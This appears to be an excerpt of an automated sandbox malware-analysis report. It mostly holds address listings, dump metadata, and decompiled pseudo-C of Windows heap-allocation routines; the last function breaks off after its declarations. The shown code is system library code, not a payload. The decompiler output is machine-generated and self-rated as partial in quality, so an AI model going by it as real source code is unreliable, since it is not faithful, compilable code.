                                                                                                                                                                                            0x33d9fe8a
                                                                                                                                                                                            0x33da0231
                                                                                                                                                                                            0x33da0231
                                                                                                                                                                                            0x33da0237
                                                                                                                                                                                            0x33da023a
                                                                                                                                                                                            0x33da0259
                                                                                                                                                                                            0x33da025e
                                                                                                                                                                                            0x33da023c
                                                                                                                                                                                            0x33da0251
                                                                                                                                                                                            0x33da0256
                                                                                                                                                                                            0x33da0264
                                                                                                                                                                                            0x33da026f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da0274
                                                                                                                                                                                            0x33d9fe90
                                                                                                                                                                                            0x33d9fe93
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fe9b
                                                                                                                                                                                            0x33d9fe9f
                                                                                                                                                                                            0x33d9fea2
                                                                                                                                                                                            0x33d9feaa
                                                                                                                                                                                            0x33d9feaf
                                                                                                                                                                                            0x33d9feb6
                                                                                                                                                                                            0x33d9feb6
                                                                                                                                                                                            0x33d9febb
                                                                                                                                                                                            0x33d9febb
                                                                                                                                                                                            0x33d9fec2
                                                                                                                                                                                            0x33d9fec7
                                                                                                                                                                                            0x33d9feca
                                                                                                                                                                                            0x33d9fecd
                                                                                                                                                                                            0x33d9fed1
                                                                                                                                                                                            0x33d9feda
                                                                                                                                                                                            0x33d9feda
                                                                                                                                                                                            0x33d9feda
                                                                                                                                                                                            0x33d9fedc
                                                                                                                                                                                            0x33d9fedf
                                                                                                                                                                                            0x33d9fee7
                                                                                                                                                                                            0x33d9fee9
                                                                                                                                                                                            0x33d9feee
                                                                                                                                                                                            0x33d9fef0
                                                                                                                                                                                            0x33da0122
                                                                                                                                                                                            0x33da0122
                                                                                                                                                                                            0x33da0125
                                                                                                                                                                                            0x33da0127
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da012d
                                                                                                                                                                                            0x33da0133
                                                                                                                                                                                            0x33da0139
                                                                                                                                                                                            0x33da01a7
                                                                                                                                                                                            0x33da01aa
                                                                                                                                                                                            0x33da01ad
                                                                                                                                                                                            0x33da01b2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da01bc
                                                                                                                                                                                            0x33da01c3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da01cd
                                                                                                                                                                                            0x33da01d4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da01da
                                                                                                                                                                                            0x33da01e0
                                                                                                                                                                                            0x33da01e3
                                                                                                                                                                                            0x33da0202
                                                                                                                                                                                            0x33da0207
                                                                                                                                                                                            0x33da01e5
                                                                                                                                                                                            0x33da01fa
                                                                                                                                                                                            0x33da01ff
                                                                                                                                                                                            0x33da0218
                                                                                                                                                                                            0x33da0219
                                                                                                                                                                                            0x33da0224
                                                                                                                                                                                            0x33da017e
                                                                                                                                                                                            0x33da017e
                                                                                                                                                                                            0x33da0184
                                                                                                                                                                                            0x33da0188
                                                                                                                                                                                            0x33da018e
                                                                                                                                                                                            0x33da0195
                                                                                                                                                                                            0x33da019b
                                                                                                                                                                                            0x33da019c
                                                                                                                                                                                            0x33da019c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da0188
                                                                                                                                                                                            0x33da013b
                                                                                                                                                                                            0x33da013e
                                                                                                                                                                                            0x33da015d
                                                                                                                                                                                            0x33da0162
                                                                                                                                                                                            0x33da0140
                                                                                                                                                                                            0x33da0155
                                                                                                                                                                                            0x33da015a
                                                                                                                                                                                            0x33da0168
                                                                                                                                                                                            0x33da0176
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fef6
                                                                                                                                                                                            0x33d9fef6
                                                                                                                                                                                            0x33d9fefc
                                                                                                                                                                                            0x33d9ff02
                                                                                                                                                                                            0x33d9ff70
                                                                                                                                                                                            0x33d9ff73
                                                                                                                                                                                            0x33d9ff76
                                                                                                                                                                                            0x33d9ff7b
                                                                                                                                                                                            0x33da0068
                                                                                                                                                                                            0x33da0070
                                                                                                                                                                                            0x33da0075
                                                                                                                                                                                            0x33da0078
                                                                                                                                                                                            0x33da007a
                                                                                                                                                                                            0x33da0080
                                                                                                                                                                                            0x33da0080
                                                                                                                                                                                            0x33da0083
                                                                                                                                                                                            0x33da0087
                                                                                                                                                                                            0x33da0090
                                                                                                                                                                                            0x33da0090
                                                                                                                                                                                            0x33da0090
                                                                                                                                                                                            0x33da0092
                                                                                                                                                                                            0x33da0094
                                                                                                                                                                                            0x33da0097
                                                                                                                                                                                            0x33da009a
                                                                                                                                                                                            0x33da009f
                                                                                                                                                                                            0x33da00a9
                                                                                                                                                                                            0x33da00ac
                                                                                                                                                                                            0x33da00ae
                                                                                                                                                                                            0x33da00af
                                                                                                                                                                                            0x33da00b3
                                                                                                                                                                                            0x33da00b3
                                                                                                                                                                                            0x33da00ac
                                                                                                                                                                                            0x33da00b8
                                                                                                                                                                                            0x33da00bc
                                                                                                                                                                                            0x33da00ec
                                                                                                                                                                                            0x33da00ef
                                                                                                                                                                                            0x33da00f2
                                                                                                                                                                                            0x33da00be
                                                                                                                                                                                            0x33da00c0
                                                                                                                                                                                            0x33da00c5
                                                                                                                                                                                            0x33da00ca
                                                                                                                                                                                            0x33da00d1
                                                                                                                                                                                            0x33da00e3
                                                                                                                                                                                            0x33da00d3
                                                                                                                                                                                            0x33da00d4
                                                                                                                                                                                            0x33da00d9
                                                                                                                                                                                            0x33da00dc
                                                                                                                                                                                            0x33da00df
                                                                                                                                                                                            0x33da00df
                                                                                                                                                                                            0x33da00e6
                                                                                                                                                                                            0x33da00e6
                                                                                                                                                                                            0x33da00f5
                                                                                                                                                                                            0x33da00f9
                                                                                                                                                                                            0x33da00fc
                                                                                                                                                                                            0x33da0108
                                                                                                                                                                                            0x33da010e
                                                                                                                                                                                            0x33da010e
                                                                                                                                                                                            0x33da010e
                                                                                                                                                                                            0x33da00fc
                                                                                                                                                                                            0x33da0114
                                                                                                                                                                                            0x33da0119
                                                                                                                                                                                            0x33da011d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da011d
                                                                                                                                                                                            0x33d9ff81
                                                                                                                                                                                            0x33d9ff88
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9ff8e
                                                                                                                                                                                            0x33d9ff91
                                                                                                                                                                                            0x33d9ff94
                                                                                                                                                                                            0x33d9ff97
                                                                                                                                                                                            0x33d9ff9c
                                                                                                                                                                                            0x33d9ffa6
                                                                                                                                                                                            0x33d9ffa9
                                                                                                                                                                                            0x33d9ffab
                                                                                                                                                                                            0x33d9ffb0
                                                                                                                                                                                            0x33d9ffb5
                                                                                                                                                                                            0x33d9ffb5
                                                                                                                                                                                            0x33d9ffa9
                                                                                                                                                                                            0x33d9ffb8
                                                                                                                                                                                            0x33d9ffbc
                                                                                                                                                                                            0x33d9ffce
                                                                                                                                                                                            0x33d9ffd1
                                                                                                                                                                                            0x33d9ffd4
                                                                                                                                                                                            0x33d9ffbe
                                                                                                                                                                                            0x33d9ffc0
                                                                                                                                                                                            0x33d9ffc5
                                                                                                                                                                                            0x33d9ffc8
                                                                                                                                                                                            0x33d9ffc8
                                                                                                                                                                                            0x33d9ffd7
                                                                                                                                                                                            0x33d9ffd9
                                                                                                                                                                                            0x33d9ffdd
                                                                                                                                                                                            0x33d9ffe0
                                                                                                                                                                                            0x33d9ffea
                                                                                                                                                                                            0x33d9fff0
                                                                                                                                                                                            0x33d9fff0
                                                                                                                                                                                            0x33d9fff0
                                                                                                                                                                                            0x33d9fff2
                                                                                                                                                                                            0x33d9fff5
                                                                                                                                                                                            0x33da0065
                                                                                                                                                                                            0x33da0065
                                                                                                                                                                                            0x33d9fff7
                                                                                                                                                                                            0x33d9fff7
                                                                                                                                                                                            0x33d9fffe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da0004
                                                                                                                                                                                            0x33da000b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da000d
                                                                                                                                                                                            0x33da0013
                                                                                                                                                                                            0x33da0016
                                                                                                                                                                                            0x33da0035
                                                                                                                                                                                            0x33da003a
                                                                                                                                                                                            0x33da0018
                                                                                                                                                                                            0x33da002d
                                                                                                                                                                                            0x33da0032
                                                                                                                                                                                            0x33da0040
                                                                                                                                                                                            0x33da004b
                                                                                                                                                                                            0x33da004c
                                                                                                                                                                                            0x33da004f
                                                                                                                                                                                            0x33da0058
                                                                                                                                                                                            0x33da005d
                                                                                                                                                                                            0x33d9ff47
                                                                                                                                                                                            0x33d9ff47
                                                                                                                                                                                            0x33d9ff4d
                                                                                                                                                                                            0x33d9ff51
                                                                                                                                                                                            0x33d9ff57
                                                                                                                                                                                            0x33d9ff5e
                                                                                                                                                                                            0x33d9ff64
                                                                                                                                                                                            0x33d9ff65
                                                                                                                                                                                            0x33d9ff65
                                                                                                                                                                                            0x33d9ff51
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fff5
                                                                                                                                                                                            0x33d9ff04
                                                                                                                                                                                            0x33d9ff07
                                                                                                                                                                                            0x33d9ff26
                                                                                                                                                                                            0x33d9ff2b
                                                                                                                                                                                            0x33d9ff09
                                                                                                                                                                                            0x33d9ff1e
                                                                                                                                                                                            0x33d9ff23
                                                                                                                                                                                            0x33d9ff31
                                                                                                                                                                                            0x33d9ff3f
                                                                                                                                                                                            0x33d9ff44
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9ff44
                                                                                                                                                                                            0x33d9fe18
                                                                                                                                                                                            0x33d9fe20
                                                                                                                                                                                            0x33d9fe28
                                                                                                                                                                                            0x33d9fe2e
                                                                                                                                                                                            0x33da02d1
                                                                                                                                                                                            0x33da02d4
                                                                                                                                                                                            0x33da02e0
                                                                                                                                                                                            0x33da02e0

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                            • API String ID: 3446177414-1700792311
                                                                                                                                                                                            • Opcode ID: 011439ddc0963d2323cd487d59f2c747c198eb403f19a90b041cb705eacf3a66
                                                                                                                                                                                            • Instruction ID: 2afb6779924ddfd017b15fe4f953bd690bcbba1732b038bf221e9796878bcc7e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 011439ddc0963d2323cd487d59f2c747c198eb403f19a90b041cb705eacf3a66
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7ED1453A901785DFDB02EFA8D540AAEBBF1FF09B10F098059E484EB652C739E945DB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D9F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                            			E33D9F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x33dcd320);
				E33D47BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E33CE7662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E33D9F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E33CEB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E33CFFED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						L33DA0835(_t188, 0);
						_t184 = E33D05D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						L33DA0D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E33DAD646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E33D23AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E33D1FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								L33DA0835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x33de47c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x33de47c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x33de47c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E33CEB910();
								} else {
									E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E33D9823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E33CEB910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E33CEB910();
								} else {
									E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E33CEB910("Just allocated block at %p for %Ix bytes\n",  *0x33de47c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x33de47a1 = 1;
									 *0x33de4100 = 0;
									asm("int3");
									 *0x33de47a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x33de3748; // 0x0
					 *0x33de91e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

























                                                                                                                                                                                            0x33d9f0a5
                                                                                                                                                                                            0x33d9f0a7
                                                                                                                                                                                            0x33d9f0ac
                                                                                                                                                                                            0x33d9f0b3
                                                                                                                                                                                            0x33d9f0b5
                                                                                                                                                                                            0x33d9f0ba
                                                                                                                                                                                            0x33d9f0bd
                                                                                                                                                                                            0x33d9f0c7
                                                                                                                                                                                            0x33d9f0e3
                                                                                                                                                                                            0x33d9f0e6
                                                                                                                                                                                            0x33d9f0f4
                                                                                                                                                                                            0x33d9f0f9
                                                                                                                                                                                            0x33d9f0fb
                                                                                                                                                                                            0x33d9f3d2
                                                                                                                                                                                            0x33d9f3d2
                                                                                                                                                                                            0x33d9f3d5
                                                                                                                                                                                            0x33d9f3d5
                                                                                                                                                                                            0x33d9f3d8
                                                                                                                                                                                            0x33d9f3df
                                                                                                                                                                                            0x33d9f3e4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f3e4
                                                                                                                                                                                            0x33d9f104
                                                                                                                                                                                            0x33d9f106
                                                                                                                                                                                            0x33d9f10b
                                                                                                                                                                                            0x33d9f111
                                                                                                                                                                                            0x33d9f114
                                                                                                                                                                                            0x33d9f117
                                                                                                                                                                                            0x33d9f119
                                                                                                                                                                                            0x33d9f11c
                                                                                                                                                                                            0x33d9f11e
                                                                                                                                                                                            0x33d9f11e
                                                                                                                                                                                            0x33d9f12e
                                                                                                                                                                                            0x33d9f134
                                                                                                                                                                                            0x33d9f137
                                                                                                                                                                                            0x33d9f13b
                                                                                                                                                                                            0x33d9f13b
                                                                                                                                                                                            0x33d9f13c
                                                                                                                                                                                            0x33d9f13f
                                                                                                                                                                                            0x33d9f142
                                                                                                                                                                                            0x33d9f144
                                                                                                                                                                                            0x33d9f350
                                                                                                                                                                                            0x33d9f350
                                                                                                                                                                                            0x33d9f356
                                                                                                                                                                                            0x33d9f359
                                                                                                                                                                                            0x33d9f378
                                                                                                                                                                                            0x33d9f37d
                                                                                                                                                                                            0x33d9f35b
                                                                                                                                                                                            0x33d9f370
                                                                                                                                                                                            0x33d9f375
                                                                                                                                                                                            0x33d9f383
                                                                                                                                                                                            0x33d9f38e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f14a
                                                                                                                                                                                            0x33d9f14a
                                                                                                                                                                                            0x33d9f14d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f153
                                                                                                                                                                                            0x33d9f156
                                                                                                                                                                                            0x33d9f15e
                                                                                                                                                                                            0x33d9f163
                                                                                                                                                                                            0x33d9f16a
                                                                                                                                                                                            0x33d9f16a
                                                                                                                                                                                            0x33d9f170
                                                                                                                                                                                            0x33d9f170
                                                                                                                                                                                            0x33d9f177
                                                                                                                                                                                            0x33d9f186
                                                                                                                                                                                            0x33d9f188
                                                                                                                                                                                            0x33d9f18b
                                                                                                                                                                                            0x33d9f18f
                                                                                                                                                                                            0x33d9f194
                                                                                                                                                                                            0x33d9f196
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f19c
                                                                                                                                                                                            0x33d9f19c
                                                                                                                                                                                            0x33d9f19f
                                                                                                                                                                                            0x33d9f1a3
                                                                                                                                                                                            0x33d9f1ac
                                                                                                                                                                                            0x33d9f1ac
                                                                                                                                                                                            0x33d9f1ac
                                                                                                                                                                                            0x33d9f1ae
                                                                                                                                                                                            0x33d9f1b0
                                                                                                                                                                                            0x33d9f1b3
                                                                                                                                                                                            0x33d9f1b6
                                                                                                                                                                                            0x33d9f1bb
                                                                                                                                                                                            0x33d9f1c5
                                                                                                                                                                                            0x33d9f1c8
                                                                                                                                                                                            0x33d9f1ca
                                                                                                                                                                                            0x33d9f1cb
                                                                                                                                                                                            0x33d9f1cf
                                                                                                                                                                                            0x33d9f1cf
                                                                                                                                                                                            0x33d9f1c8
                                                                                                                                                                                            0x33d9f1d4
                                                                                                                                                                                            0x33d9f1d8
                                                                                                                                                                                            0x33d9f208
                                                                                                                                                                                            0x33d9f20b
                                                                                                                                                                                            0x33d9f20e
                                                                                                                                                                                            0x33d9f1da
                                                                                                                                                                                            0x33d9f1dc
                                                                                                                                                                                            0x33d9f1e1
                                                                                                                                                                                            0x33d9f1e6
                                                                                                                                                                                            0x33d9f1ed
                                                                                                                                                                                            0x33d9f1ff
                                                                                                                                                                                            0x33d9f1ef
                                                                                                                                                                                            0x33d9f1f0
                                                                                                                                                                                            0x33d9f1f5
                                                                                                                                                                                            0x33d9f1f8
                                                                                                                                                                                            0x33d9f1fb
                                                                                                                                                                                            0x33d9f1fb
                                                                                                                                                                                            0x33d9f202
                                                                                                                                                                                            0x33d9f202
                                                                                                                                                                                            0x33d9f202
                                                                                                                                                                                            0x33d9f211
                                                                                                                                                                                            0x33d9f214
                                                                                                                                                                                            0x33d9f218
                                                                                                                                                                                            0x33d9f21b
                                                                                                                                                                                            0x33d9f227
                                                                                                                                                                                            0x33d9f22d
                                                                                                                                                                                            0x33d9f22d
                                                                                                                                                                                            0x33d9f22d
                                                                                                                                                                                            0x33d9f22f
                                                                                                                                                                                            0x33d9f236
                                                                                                                                                                                            0x33d9f238
                                                                                                                                                                                            0x33d9f23c
                                                                                                                                                                                            0x33d9f23c
                                                                                                                                                                                            0x33d9f244
                                                                                                                                                                                            0x33d9f24a
                                                                                                                                                                                            0x33d9f250
                                                                                                                                                                                            0x33d9f2be
                                                                                                                                                                                            0x33d9f2c1
                                                                                                                                                                                            0x33d9f2c4
                                                                                                                                                                                            0x33d9f2c9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f2cf
                                                                                                                                                                                            0x33d9f2d2
                                                                                                                                                                                            0x33d9f2d5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f2db
                                                                                                                                                                                            0x33d9f2e2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f2ec
                                                                                                                                                                                            0x33d9f2f3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f2f9
                                                                                                                                                                                            0x33d9f2ff
                                                                                                                                                                                            0x33d9f302
                                                                                                                                                                                            0x33d9f321
                                                                                                                                                                                            0x33d9f326
                                                                                                                                                                                            0x33d9f304
                                                                                                                                                                                            0x33d9f319
                                                                                                                                                                                            0x33d9f31e
                                                                                                                                                                                            0x33d9f337
                                                                                                                                                                                            0x33d9f338
                                                                                                                                                                                            0x33d9f343
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f252
                                                                                                                                                                                            0x33d9f252
                                                                                                                                                                                            0x33d9f255
                                                                                                                                                                                            0x33d9f274
                                                                                                                                                                                            0x33d9f279
                                                                                                                                                                                            0x33d9f257
                                                                                                                                                                                            0x33d9f26c
                                                                                                                                                                                            0x33d9f271
                                                                                                                                                                                            0x33d9f27f
                                                                                                                                                                                            0x33d9f28d
                                                                                                                                                                                            0x33d9f295
                                                                                                                                                                                            0x33d9f295
                                                                                                                                                                                            0x33d9f29b
                                                                                                                                                                                            0x33d9f29f
                                                                                                                                                                                            0x33d9f2a5
                                                                                                                                                                                            0x33d9f2ac
                                                                                                                                                                                            0x33d9f2b2
                                                                                                                                                                                            0x33d9f2b3
                                                                                                                                                                                            0x33d9f2b3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f29f
                                                                                                                                                                                            0x33d9f250
                                                                                                                                                                                            0x33d9f196
                                                                                                                                                                                            0x33d9f0c9
                                                                                                                                                                                            0x33d9f0ce
                                                                                                                                                                                            0x33d9f0d6
                                                                                                                                                                                            0x33d9f0dc
                                                                                                                                                                                            0x33d9f3e7
                                                                                                                                                                                            0x33d9f3ea
                                                                                                                                                                                            0x33d9f3f6
                                                                                                                                                                                            0x33d9f3f6

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                            • API String ID: 3446177414-1745908468
                                                                                                                                                                                            • Opcode ID: d2ea6d3f456b2d8f09c82f38afcca6451ee4bab631a9fc960d21b86f7e400d31
                                                                                                                                                                                            • Instruction ID: 3d8a90112075212ea2f2f82dfbd39435be1f78e321e0dfe7f7750e495025b8d6
                                                                                                                                                                                            • Opcode Fuzzy Hash: d2ea6d3f456b2d8f09c82f38afcca6451ee4bab631a9fc960d21b86f7e400d31
                                                                                                                                                                                            • Instruction Fuzzy Hash: B39100369057459FEB01DFA8C440AEDBBFAFF49711F088249E484AF652CB7AA941CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CED2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                            			E33CED2EC(unsigned int __ecx, signed int _a4, intOrPtr _a8, char* _a12, intOrPtr* _a16) {
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				unsigned int _v100;
				signed int _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v117;
				char _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v164;
				void* _t116;
				void* _t124;
